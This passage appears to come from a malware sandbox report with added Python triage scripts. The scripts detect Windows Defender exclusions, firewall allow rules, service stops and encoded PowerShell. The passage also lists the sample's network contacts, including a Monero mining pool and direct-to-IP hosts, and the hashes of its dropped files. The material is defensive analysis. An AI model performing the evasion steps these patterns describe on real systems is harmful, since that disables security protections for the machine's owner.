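EXCL_RE = re.compile(r'Windows Defender\\Exclusions\\(Paths|Extensions|Processes)[\\"]*\s+(?:/f\s+)?/v\s+(?:"([^"]+)"|(\S+))', re.I)
MPPREF_RE = re.compile(r'Add-MpPreference\b.*?-Exclusion(Path|Process|Extension)\s+(.+?)(?=\s+-\w|$)', re.I)
SPYNET_RE = re.compile(r'Windows Defender\\Spynet[\\"]*\s+(?:/f\s+)?/v\s+[\\"]*(\w+)', re.I)
FW_RE = re.compile(r'netsh\s+advfirewall\s+firewall\s+add\s+rule\b(.*)', re.I)
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
SC_STOP_RE = re.compile(r'\bsc\s+stop\s+(\S+)', re.I)
POWERCFG_RE = re.compile(r'powercfg\s+/x\s+-(standby|hibernate)-timeout-(ac|dc)\s+0\b', re.I)
SCHTASKS_RE = re.compile(r'schtasks\s+/create\b', re.I)
ENC_RE = re.compile(r'(?<!\S)-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/]+=*)', re.I)
DELETE_RE = re.compile(r'\bDELETE\b', re.I)


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand payloads are base64 over UTF-16LE text, not over raw bytes."""
    return base64.b64decode(b64).decode("utf-16-le")


def _opt(cmdline: str, name: str) -> str | None:
    """Value of a schtasks /NAME option; quoted values may contain backslash-escaped quotes."""
    m = re.search(r'/' + name + r'\s+("(?:[^"\\]|\\.)*"|\S+)', cmdline, re.I)
    return m.group(1).strip('"') if m else None


def classify(cmdline: str) -> list[tuple[str, str]]:
    """(tag, detail) pairs for every evasion or persistence pattern found in one command line."""
    hits: list[tuple[str, str]] = []
    deleting = bool(DELETE_RE.search(cmdline))
    for threat_id, code in THREAT_RE.findall(cmdline):
        hits.append(("DEFENDER_THREAT_ACTION", f"threat {threat_id} -> {'Allow' if code == ALLOW_CODE else 'code ' + code}"))
    for kind, quoted, bare in EXCL_RE.findall(cmdline):
        hits.append((f"DEFENDER_EXCLUSION_{'REMOVE' if deleting else 'ADD'}", f"{kind}: {quoted or bare}"))
    if m := MPPREF_RE.search(cmdline):
        hits.append(("DEFENDER_EXCLUSION_ADD", f"{m.group(1)}: {m.group(2)}"))
    if m := SPYNET_RE.search(cmdline):
        hits.append(("DEFENDER_TELEMETRY_TAMPER", f"Spynet\\{m.group(1)} {'deleted' if deleting else 'set'}"))
    if m := FW_RE.search(cmdline):
        kv = {k.lower(): q or b for k, q, b in KV_RE.findall(m.group(1))}
        if kv.get("action", "").lower() == "allow":
            hits.append(("FIREWALL_ALLOW", f"{kv.get('dir')} {kv.get('program')}"))
    for svc in SC_STOP_RE.findall(cmdline):
        hits.append(("UPDATE_SERVICE_STOP" if svc.lower() in UPDATE_SERVICES else "SERVICE_STOP", svc))
    for kind, power in POWERCFG_RE.findall(cmdline):
        hits.append(("SLEEP_DISABLED", f"{kind}/{power}"))
    if SCHTASKS_RE.search(cmdline):
        run_as, level = _opt(cmdline, "RU"), _opt(cmdline, "RL")
        if (run_as or "").upper() == "SYSTEM" or (level or "").upper() == "HIGHEST":
            hits.append(("PRIVILEGED_SCHTASK", f"{run_as or level}: {_opt(cmdline, 'TR')}"))
    if m := ENC_RE.search(cmdline):
        hits.append(("ENCODED_POWERSHELL", decode_encoded_command(m.group(1))))
    return hits


def triage(cmdlines: list[str]) -> dict[str, list[str]]:
    """Group hits by tag across a whole process list."""
    summary: dict[str, list[str]] = {}
    for line in cmdlines:
        for tag, detail in classify(line):
            summary.setdefault(tag, []).append(detail)
    return summary


if __name__ == "__main__":
    for tag, details in triage(SAMPLE_CMDLINES).items():
        print(tag, *details, sep="\n    ")
```

The encoded command decodes to start-process -WindowStyle Hidden gpupdate.exe /force, which explains the gpupdate.exe /force processes later in the list: the sample writes its overrides under HKLM\SOFTWARE\Policies\Microsoft\Windows Defender and then forces a policy refresh so Defender picks them up. The Add-MpPreference line excludes the whole user profile and Program Files trees in one call. On a fleet not managed through Group Policy, any value under that Policies key is a finding in itself.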

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 147.255.221.88.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 yip.su udp
US 8.8.8.8:53 pastebin.com udp
US 188.114.97.0:443 yip.su tcp
US 104.20.67.143:443 pastebin.com tcp
US 8.8.8.8:53 julimichkids.online udp
US 8.8.8.8:53 gobo23cl.top udp
US 8.8.8.8:53 gobo24cl.top udp
MY 111.90.146.230:80 tcp
US 8.8.8.8:53 flyawayaero.net udp
US 8.8.8.8:53 lycheepanel.info udp
US 8.8.8.8:53 redirector.pm udp
US 8.8.8.8:53 rawcracker.com udp
US 8.8.8.8:53 net.geo.opera.com udp
US 194.49.94.67:80 tcp
DE 88.198.22.18:443 julimichkids.online tcp
US 104.21.43.7:80 gobo23cl.top tcp
US 188.114.97.0:443 rawcracker.com tcp
US 104.21.93.225:443 flyawayaero.net tcp
US 104.21.32.208:443 lycheepanel.info tcp
US 194.49.94.85:443 redirector.pm tcp
NL 185.26.182.112:80 net.geo.opera.com tcp
US 188.114.96.0:80 rawcracker.com tcp
NL 185.26.182.112:443 net.geo.opera.com tcp
US 104.21.43.7:443 gobo23cl.top tcp
US 188.114.96.0:443 rawcracker.com tcp
US 8.8.8.8:53 potatogoose.com udp
US 8.8.8.8:53 bobkelsofan.com udp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
US 8.8.8.8:53 143.67.20.104.in-addr.arpa udp
US 172.67.180.173:443 potatogoose.com tcp
US 104.21.27.119:443 bobkelsofan.com tcp
US 8.8.8.8:53 7.43.21.104.in-addr.arpa udp
US 8.8.8.8:53 225.93.21.104.in-addr.arpa udp
US 8.8.8.8:53 112.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 208.32.21.104.in-addr.arpa udp
US 8.8.8.8:53 85.94.49.194.in-addr.arpa udp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 18.22.198.88.in-addr.arpa udp
US 8.8.8.8:53 173.180.67.172.in-addr.arpa udp
US 8.8.8.8:53 119.27.21.104.in-addr.arpa udp
US 8.8.8.8:53 autoupdate.geo.opera.com udp
US 8.8.8.8:53 desktop-netinstaller-sub.osp.opera.software udp
NL 82.145.216.20:443 autoupdate.geo.opera.com tcp
NL 82.145.216.20:443 autoupdate.geo.opera.com tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 20.216.145.82.in-addr.arpa udp
US 8.8.8.8:53 121.217.145.82.in-addr.arpa udp
US 8.8.8.8:53 features.opera-api2.com udp
US 8.8.8.8:53 download.opera.com udp
NL 82.145.216.15:443 features.opera-api2.com tcp
NL 82.145.216.23:443 download.opera.com tcp
US 8.8.8.8:53 download3.operacdn.com udp
NL 104.110.240.11:443 download3.operacdn.com tcp
TR 185.216.70.235:80 185.216.70.235 tcp
US 8.8.8.8:53 api.myip.com udp
US 172.67.75.163:443 api.myip.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 15.216.145.82.in-addr.arpa udp
US 8.8.8.8:53 23.216.145.82.in-addr.arpa udp
US 8.8.8.8:53 11.240.110.104.in-addr.arpa udp
US 8.8.8.8:53 163.75.67.172.in-addr.arpa udp
US 8.8.8.8:53 235.70.216.185.in-addr.arpa udp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 126.178.238.8.in-addr.arpa udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 126.211.247.8.in-addr.arpa udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 36.249.124.192.in-addr.arpa udp
DE 167.235.143.166:443 tcp
US 8.8.8.8:53 166.143.235.167.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
DE 167.235.143.166:443 tcp
DE 167.235.143.166:443 tcp
DE 167.235.143.166:443 tcp
DE 167.235.143.166:443 tcp
DE 167.235.143.166:443 tcp
DE 167.235.143.166:443 tcp
NL 149.154.167.99:443 t.me tcp
DE 167.235.143.166:443 tcp
DE 167.235.143.166:443 tcp
DE 167.235.143.166:443 tcp
DE 167.235.143.166:443 tcp
DE 167.235.143.166:443 tcp
DE 167.235.143.166:443 tcp
DE 167.235.143.166:443 tcp
US 8.8.8.8:53 1.208.79.178.in-addr.arpa udp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
US 95.214.26.28:80 host-host-file8.com tcp
US 8.8.8.8:53 28.26.214.95.in-addr.arpa udp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
FR 51.15.193.130:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 130.193.15.51.in-addr.arpa udp
US 8.8.8.8:53 f2b94aee-d258-426d-80b3-6d839b5bc858.uuid.realupdate.ru udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
FR 51.15.193.130:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 13.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 service-domain.xyz udp
US 3.80.150.121:443 service-domain.xyz tcp
US 8.8.8.8:53 121.150.80.3.in-addr.arpa udp
US 8.8.8.8:53 142.33.222.23.in-addr.arpa udp
US 8.8.8.8:53 176.25.221.88.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
NL 142.251.36.46:443 clients2.google.com tcp
US 8.8.8.8:53 138.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 35.36.251.142.in-addr.arpa udp
NL 142.251.36.1:443 clients2.googleusercontent.com tcp
NL 142.251.36.46:443 clients2.google.com tcp
US 8.8.8.8:53 46.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 1.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 vk.com udp
RU 87.240.132.67:80 vk.com tcp
RU 87.240.132.67:80 vk.com tcp
RU 87.240.132.67:80 vk.com tcp
RU 87.240.132.67:443 vk.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 67.132.240.87.in-addr.arpa udp
US 8.8.8.8:53 server7.realupdate.ru udp
US 8.8.8.8:53 stun.stunprotocol.org udp
US 162.159.135.233:443 cdn.discordapp.com tcp
BG 185.82.216.96:443 server7.realupdate.ru tcp
US 8.8.8.8:53 walkinglate.com udp
US 8.8.8.8:53 api2.check-data.xyz udp
US 188.114.97.0:443 walkinglate.com tcp
US 8.8.8.8:53 233.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 226.21.18.104.in-addr.arpa udp
US 8.8.8.8:53 96.216.82.185.in-addr.arpa udp
US 8.8.8.8:53 226.20.18.104.in-addr.arpa udp
US 44.240.219.117:80 api2.check-data.xyz tcp
US 8.8.8.8:53 117.219.240.44.in-addr.arpa udp
DE 185.220.101.30:8443 tcp
NL 194.26.192.187:443 tcp
US 8.8.8.8:53 187.192.26.194.in-addr.arpa udp
DE 5.189.181.61:443 tcp
US 8.8.8.8:53 61.181.189.5.in-addr.arpa udp
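
The table above turned into an analyst summary, as an added example (not part of the report): it parses the page's Country / Destination / Domain / Proto layout, where the Domain column is absent for direct-to-IP sessions, drops the sandbox's own reverse-DNS lookups (the in-addr.arpa rows), and buckets the rest. The category names and the domain lists are the example's own, built from what the table shows: the two external-IP lookup services, the hosting services behind the report's "Legitimate hosting services abused" signature, the Opera installer domains, and xmr-eu1.nanopool.org:14433, a Monero mining-pool endpoint consistent with the powercfg and service-stop activity earlier. The rows embedded below are a representative subset copied from the table.

```python
from __future__ import annotations

import ipaddress

# Rows copied from the Network table above (a representative subset). Layout is the
# page's "Country Destination Domain Proto"; Domain is absent for direct-to-IP sessions.
NETWORK_ROWS = """\
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
MY 111.90.146.230:80 tcp
US 172.67.75.163:443 api.myip.com tcp
US 34.117.59.81:443 ipinfo.io tcp
TR 185.216.70.235:80 185.216.70.235 tcp
NL 149.154.167.99:443 t.me tcp
DE 167.235.143.166:443 tcp
FR 51.15.193.130:14433 xmr-eu1.nanopool.org tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
RU 87.240.132.67:80 vk.com tcp
NL 82.145.216.20:443 autoupdate.geo.opera.com tcp
N/A 224.0.0.251:5353 udp
DE 185.220.101.30:8443 tcp
"""

# Lists built from the table itself: the two "looks up external IP" services, the hosting
# services behind the report's hosting-abuse signature, the Opera installer domains, and
# the mining pool. Extend them from your own intel; they are this example's, not the report's.
IP_CHECK_SERVICES = {"api.myip.com", "ipinfo.io"}
HOSTING_SERVICES = {"pastebin.com", "cdn.discordapp.com", "t.me", "vk.com"}
INSTALLER_SUFFIXES = (".opera.com", ".operacdn.com", ".opera.software", "opera-api2.com")
MINING_POOL_MARKERS = ("nanopool.org",)  # xmr-eu1.nanopool.org:14433 is a Monero pool endpoint


def parse_rows(text: str) -> list[dict]:
    """One dict per row; the optional Domain column is detected from the token count."""
    rows = []
    for line in text.splitlines():
        tokens = line.split()
        if len(tokens) < 3:
            continue  # blank or malformed line
        country, dest, proto = tokens[0], tokens[1], tokens[-1]
        domain = tokens[2] if len(tokens) == 4 else ""
        ip, port = dest.rsplit(":", 1)
        rows.append({"country": country, "ip": ipaddress.ip_address(ip),
                     "port": int(port), "domain": domain, "proto": proto})
    return rows


def categorize(row: dict) -> str:
    """Order matters: noise first, then known-good and known-bad names, then the unexplained."""
    domain, ip, port, proto = row["domain"], row["ip"], row["port"], row["proto"]
    if domain.endswith(".in-addr.arpa"):
        return "dns-ptr-noise"      # the sandbox reverse-resolves every peer; not sample-driven
    if ip.is_multicast:
        return "multicast"          # mDNS and similar local chatter
    if proto == "udp" and port == 53:
        return "dns-query"          # resolution of a name the sample asked for
    if domain in IP_CHECK_SERVICES:
        return "ip-check"
    if any(marker in domain for marker in MINING_POOL_MARKERS):
        return "mining-pool"
    if domain in HOSTING_SERVICES:
        return "hosting-abuse-candidates"
    if domain.endswith(INSTALLER_SUFFIXES):
        return "installer-traffic"
    if not domain or domain == str(ip):
        return "direct-to-ip"       # no hostname context at all: review these first as C2 candidates
    return "other"


def summarize(text: str) -> dict[str, list[str]]:
    """Category -> sorted, de-duplicated 'name:port' endpoints."""
    buckets: dict[str, set[str]] = {}
    for row in parse_rows(text):
        key = f"{row['domain'] or row['ip']}:{row['port']}"
        buckets.setdefault(categorize(row), set()).add(key)
    return {cat: sorted(keys) for cat, keys in sorted(buckets.items())}


if __name__ == "__main__":
    for category, endpoints in summarize(NETWORK_ROWS).items():
        print(f"{category}: {', '.join(endpoints)}")
```

Repeated identical rows in the original table (for example the run of 167.235.143.166:443 sessions) collapse to one endpoint here; keep the raw table when the connection count matters for timing analysis.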

Files

memory/4624-0-0x0000000074A30000-0x00000000751E0000-memory.dmp

memory/4624-1-0x0000000000AA0000-0x0000000001980000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

MD5 cba9c1d1fcbf999d9ccb04050c5c5154
SHA1 554e436c9c3f1f16c9a9b7ab74dd4cd191118481
SHA256 c3ab7948969593528e883956dc2cb0a754a4832076bc2e9b6c4f1c7ce2002842
SHA512 c7d8be36705e08fcd8a7ed8a319aac2aa1d26397081a75511408d51871daa05e21c89be7428eda8a5f7f757ba0c0e74e710e8515b26c89c19b8d7f480a1c0a0b

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 8ef35a51d9b58606554128b7556ceac2
SHA1 7db9caaa38f1d8bbf36c200e8f721e8e2569cf30
SHA256 b193ce6afc9a17e3e56c5a6944db038c0c88fb25e551acc551dd2a019786590e
SHA512 92be8d6f87d89d762ee25a8546eedc1e0fdce6f25685b59070555b2587e3f011712ebe725326b57cbaeb041dcc2551672342d1830d6b2df05c8183696d21df24

C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe

MD5 14a535954bf4becdfd4dc6ad7cb45153
SHA1 d9eb9619e56cf54334e4cb28490113b6a5984c79
SHA256 32e227b8c3da4ffbf6a8d5565c2d7695e16096fd24810f4d065aaa58906664ff
SHA512 6c023d083708947a97c56bf2331f0f4dfebe544d452d1e16b73c6059a3b5ab1b69b4d21478d6851b520c1216213c1de6c51a83f50670cfb86f3e30573ba343b1

C:\Users\Admin\AppData\Local\Temp\Random.exe

MD5 af49996cdbe1e9d9ca66458a06725a94
SHA1 a6bd1c6a78483ba1b7ee3cb9670568684039501d
SHA256 a3ca8a3d9ef3abbfdb9fbb3dc086e271f8174775066607c68fe9a07e74ba8b73
SHA512 c8d2423c2df83d5d7cec894accde437f15204636d91a7c813eed7a2bcf3a8560ab5855e53a4e2038a340da7213c2489777678fde67fee9d54570f29c82b1115b

C:\Users\Admin\AppData\Local\Temp\Random.exe

MD5 af49996cdbe1e9d9ca66458a06725a94
SHA1 a6bd1c6a78483ba1b7ee3cb9670568684039501d
SHA256 a3ca8a3d9ef3abbfdb9fbb3dc086e271f8174775066607c68fe9a07e74ba8b73
SHA512 c8d2423c2df83d5d7cec894accde437f15204636d91a7c813eed7a2bcf3a8560ab5855e53a4e2038a340da7213c2489777678fde67fee9d54570f29c82b1115b

C:\Users\Admin\AppData\Local\Temp\Broom.exe

MD5 00e93456aa5bcf9f60f84b0c0760a212
SHA1 6096890893116e75bd46fea0b8c3921ceb33f57d
SHA256 ff3025f9cf19323c5972d14f00f01296d6d7a71547eca7e4016bfd0e1f27b504
SHA512 abd2be819c7d93bd6097155cf84eaf803e3133a7e0ca71f9d9cbc3c65e4e4a26415d2523a36adafdd19b0751e25ea1a99b8d060cad61cdfd1f79adf9cd4b4eca

C:\Users\Admin\AppData\Local\Temp\Random.exe

MD5 af49996cdbe1e9d9ca66458a06725a94
SHA1 a6bd1c6a78483ba1b7ee3cb9670568684039501d
SHA256 a3ca8a3d9ef3abbfdb9fbb3dc086e271f8174775066607c68fe9a07e74ba8b73
SHA512 c8d2423c2df83d5d7cec894accde437f15204636d91a7c813eed7a2bcf3a8560ab5855e53a4e2038a340da7213c2489777678fde67fee9d54570f29c82b1115b

memory/1536-40-0x0000000074A30000-0x00000000751E0000-memory.dmp

memory/1536-42-0x0000000000D30000-0x0000000000FC0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/4992-47-0x0000000002930000-0x0000000002931000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/1536-51-0x0000000005DE0000-0x0000000006384000-memory.dmp

memory/1536-52-0x00000000058D0000-0x0000000005962000-memory.dmp

memory/4624-53-0x0000000074A30000-0x00000000751E0000-memory.dmp

memory/1536-54-0x0000000005A10000-0x0000000005AAC000-memory.dmp

memory/1536-55-0x0000000005870000-0x0000000005880000-memory.dmp

memory/1536-56-0x0000000005890000-0x000000000589A000-memory.dmp

memory/1536-57-0x0000000006390000-0x000000000661A000-memory.dmp

memory/1536-58-0x0000000006650000-0x000000000666A000-memory.dmp

memory/4444-60-0x0000000000400000-0x0000000000408000-memory.dmp

memory/1536-62-0x0000000074A30000-0x00000000751E0000-memory.dmp

memory/4444-64-0x0000000074A30000-0x00000000751E0000-memory.dmp

memory/1976-63-0x0000000004680000-0x00000000046B6000-memory.dmp

memory/1976-66-0x0000000004730000-0x0000000004740000-memory.dmp

memory/1976-65-0x0000000074A30000-0x00000000751E0000-memory.dmp

memory/1976-67-0x0000000004730000-0x0000000004740000-memory.dmp

memory/4444-68-0x0000000004F60000-0x0000000004F70000-memory.dmp

memory/1976-69-0x0000000004D70000-0x0000000005398000-memory.dmp

memory/3808-70-0x00000000008A0000-0x00000000009A0000-memory.dmp

memory/3808-72-0x00000000022D0000-0x00000000022D9000-memory.dmp

memory/1976-71-0x00000000053A0000-0x00000000053C2000-memory.dmp

memory/1976-78-0x0000000005440000-0x00000000054A6000-memory.dmp

memory/1976-80-0x00000000055E0000-0x0000000005646000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 8ef35a51d9b58606554128b7556ceac2
SHA1 7db9caaa38f1d8bbf36c200e8f721e8e2569cf30
SHA256 b193ce6afc9a17e3e56c5a6944db038c0c88fb25e551acc551dd2a019786590e
SHA512 92be8d6f87d89d762ee25a8546eedc1e0fdce6f25685b59070555b2587e3f011712ebe725326b57cbaeb041dcc2551672342d1830d6b2df05c8183696d21df24

memory/2276-79-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2276-86-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pxnhs3tv.tvt.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1976-87-0x0000000005750000-0x0000000005AA4000-memory.dmp

memory/1976-96-0x0000000005C30000-0x0000000005C4E000-memory.dmp

memory/1976-97-0x0000000005C70000-0x0000000005CBC000-memory.dmp

C:\Users\Admin\Pictures\r5retndwSKQXRFWSHGEiAp2x.exe

MD5 d373ff7cb6ac28b844d9c90fc8f1ab3f
SHA1 8bd2bd07e929d71f5c27ba7fab3777f29a4c48e3
SHA256 92a53acf35b82eaf96286b8a5dab6cef0513c48dff9e480fa3486033258c093b
SHA512 f89fce3365f1a9091b2523ea310089c53d67469e1d75b1e842eff2d59eb2a42fbbb49f03f3a45f9e56734895add9ac865e9adc1dbc0dfc4b34314b48bb0871a1

C:\Users\Admin\Pictures\tE5AFUP5eIEX56SyJTaGFNCE.exe

MD5 1c4ba9eb815ad39858def7341d3cfff1
SHA1 ea2178498ae21f72c1b3e747b52eb2c352d0aaeb
SHA256 43b6c8b1f176259c637c7da21aeab0fcf0f3934c599ceacb755c937ef71d0238
SHA512 f5ce6a136ba922c67e2a7a4b333a3a4196aaefc7acf7650b23c206ca4c9f4bd647772c4af2afd22f2c21cdc2dd570f34eb47537afba4d9e9d4b620ff08baeee1

C:\Users\Admin\Pictures\tE5AFUP5eIEX56SyJTaGFNCE.exe

MD5 1c4ba9eb815ad39858def7341d3cfff1
SHA1 ea2178498ae21f72c1b3e747b52eb2c352d0aaeb
SHA256 43b6c8b1f176259c637c7da21aeab0fcf0f3934c599ceacb755c937ef71d0238
SHA512 f5ce6a136ba922c67e2a7a4b333a3a4196aaefc7acf7650b23c206ca4c9f4bd647772c4af2afd22f2c21cdc2dd570f34eb47537afba4d9e9d4b620ff08baeee1

C:\Users\Admin\Pictures\tE5AFUP5eIEX56SyJTaGFNCE.exe

MD5 1c4ba9eb815ad39858def7341d3cfff1
SHA1 ea2178498ae21f72c1b3e747b52eb2c352d0aaeb
SHA256 43b6c8b1f176259c637c7da21aeab0fcf0f3934c599ceacb755c937ef71d0238
SHA512 f5ce6a136ba922c67e2a7a4b333a3a4196aaefc7acf7650b23c206ca4c9f4bd647772c4af2afd22f2c21cdc2dd570f34eb47537afba4d9e9d4b620ff08baeee1

C:\Users\Admin\Pictures\qVMXMu075wJzdK0JO5poj9gi.exe

MD5 1c4ba9eb815ad39858def7341d3cfff1
SHA1 ea2178498ae21f72c1b3e747b52eb2c352d0aaeb
SHA256 43b6c8b1f176259c637c7da21aeab0fcf0f3934c599ceacb755c937ef71d0238
SHA512 f5ce6a136ba922c67e2a7a4b333a3a4196aaefc7acf7650b23c206ca4c9f4bd647772c4af2afd22f2c21cdc2dd570f34eb47537afba4d9e9d4b620ff08baeee1

C:\Users\Admin\Pictures\SpMwCbcnnE24Y9Cm4FMqbe66.exe

MD5 3029e2e226e0e0310a14943d2e8f0f8a
SHA1 2ed83097fe1ea84d5ff91a924d6b8a7df2a111d6
SHA256 c4a263f9b0d851926cdf4042017610fcfccb721b66967f2999ddfa33f89d9253
SHA512 6a0d62e194dfb8b80f883c68495c95a95064cf43e4d77cae7569e3fa51b808fbb297aac6d3398dfac8a70416eaf2acee4b0abcdcc25fba183bf693a299ed741a

C:\Users\Admin\Pictures\r5retndwSKQXRFWSHGEiAp2x.exe

MD5 d373ff7cb6ac28b844d9c90fc8f1ab3f
SHA1 8bd2bd07e929d71f5c27ba7fab3777f29a4c48e3
SHA256 92a53acf35b82eaf96286b8a5dab6cef0513c48dff9e480fa3486033258c093b
SHA512 f89fce3365f1a9091b2523ea310089c53d67469e1d75b1e842eff2d59eb2a42fbbb49f03f3a45f9e56734895add9ac865e9adc1dbc0dfc4b34314b48bb0871a1

C:\Users\Admin\Pictures\r5retndwSKQXRFWSHGEiAp2x.exe

MD5 d373ff7cb6ac28b844d9c90fc8f1ab3f
SHA1 8bd2bd07e929d71f5c27ba7fab3777f29a4c48e3
SHA256 92a53acf35b82eaf96286b8a5dab6cef0513c48dff9e480fa3486033258c093b
SHA512 f89fce3365f1a9091b2523ea310089c53d67469e1d75b1e842eff2d59eb2a42fbbb49f03f3a45f9e56734895add9ac865e9adc1dbc0dfc4b34314b48bb0871a1

C:\Users\Admin\Pictures\SpMwCbcnnE24Y9Cm4FMqbe66.exe

MD5 3029e2e226e0e0310a14943d2e8f0f8a
SHA1 2ed83097fe1ea84d5ff91a924d6b8a7df2a111d6
SHA256 c4a263f9b0d851926cdf4042017610fcfccb721b66967f2999ddfa33f89d9253
SHA512 6a0d62e194dfb8b80f883c68495c95a95064cf43e4d77cae7569e3fa51b808fbb297aac6d3398dfac8a70416eaf2acee4b0abcdcc25fba183bf693a299ed741a

C:\Users\Admin\Pictures\qVMXMu075wJzdK0JO5poj9gi.exe

MD5 1c4ba9eb815ad39858def7341d3cfff1
SHA1 ea2178498ae21f72c1b3e747b52eb2c352d0aaeb
SHA256 43b6c8b1f176259c637c7da21aeab0fcf0f3934c599ceacb755c937ef71d0238
SHA512 f5ce6a136ba922c67e2a7a4b333a3a4196aaefc7acf7650b23c206ca4c9f4bd647772c4af2afd22f2c21cdc2dd570f34eb47537afba4d9e9d4b620ff08baeee1

C:\Users\Admin\Pictures\SpMwCbcnnE24Y9Cm4FMqbe66.exe

MD5 3029e2e226e0e0310a14943d2e8f0f8a
SHA1 2ed83097fe1ea84d5ff91a924d6b8a7df2a111d6
SHA256 c4a263f9b0d851926cdf4042017610fcfccb721b66967f2999ddfa33f89d9253
SHA512 6a0d62e194dfb8b80f883c68495c95a95064cf43e4d77cae7569e3fa51b808fbb297aac6d3398dfac8a70416eaf2acee4b0abcdcc25fba183bf693a299ed741a

C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe

MD5 7d4b677be7d62f98fd161a9dac97941e
SHA1 112f4030f205cfbffa6c1fe0b2e74f62f572a844
SHA256 e7d1b66b70af1e4408c197bbff2082873265d468f4aedc3c3c336fd635b47ca1
SHA512 81922a9f12635cb85131a63510b9b43a548eb322bca555617c76926829123535402ebb77359b8c6964b45638545d5937d5663e82407f4c656895ea2e210592f9

C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe

MD5 6d3fc2f2abab017258985e5b32fb07ef
SHA1 1f686bfb1b6f83dc70a6c6af343053d186198222
SHA256 47eb746cecc1f58ff38d9b4e6c1647752418e5fa0abecd9bcb89ed7ad0e189d0
SHA512 4fd5e4dabca324c442a4f9566d69823cf71573001460901c912f42450ace209a35737e22e25e77611e728c2c59224aa2558b70ea50e6ae3cdf2c4246fdab1923

C:\Users\Admin\Pictures\ajCAHplTtJAZsFYO2cpv1Bao.exe

MD5 6adbe8c1f705afaf91d59f32de9fa981
SHA1 6af94d5829f6469f32d36ae852701acb800cb33e
SHA256 4145304d995415d5e3047c189a8339b65b4a0af2f2f9680f6eafd956ac55a2ff
SHA512 7cbfe87a43f859ebaafb7d4833e53fabd6b542491feb04eb9798aa69a3c91313d3280f286aeaff89bd9b6bb256841ad27c5609bdec5540744d5f24df00f386a5

C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe

MD5 6d3fc2f2abab017258985e5b32fb07ef
SHA1 1f686bfb1b6f83dc70a6c6af343053d186198222
SHA256 47eb746cecc1f58ff38d9b4e6c1647752418e5fa0abecd9bcb89ed7ad0e189d0
